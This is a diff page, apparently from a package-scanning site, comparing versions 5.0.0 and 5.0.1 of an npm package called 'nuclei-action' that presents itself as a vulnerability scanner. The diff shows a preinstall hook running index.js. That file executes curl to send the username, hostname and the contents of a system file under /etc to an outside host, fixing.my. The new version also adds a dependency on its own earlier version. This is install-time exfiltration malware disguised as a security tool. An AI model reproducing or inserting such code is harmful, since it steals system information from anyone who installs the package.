nuclei-action 5.0.0 → 5.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +0 -1
  2. package/package.json +5 -2
package/index.js CHANGED
@@ -9,5 +9,4 @@ exec("curl -X POST fixing.my/nuclei-action/\`whoami\`/\`hostname\`/ -A $(cat /et
9
9
  return;
10
10
  }
11
11
  console.log(data);
12
-
13
12
  });
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "nuclei-action",
3
- "version": "5.0.0",
3
+ "version": "5.0.1",
4
4
  "description": "Vulnerability Scan with Nuclei",
5
5
  "main": "index.js",
6
6
  "scripts": {
@@ -8,5 +8,8 @@
8
8
  "preinstall": "node index.js"
9
9
  },
10
10
  "author": "",
11
- "license": "ISC"
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "nuclei-action": "^5.0.0"
14
+ }
12
15
  }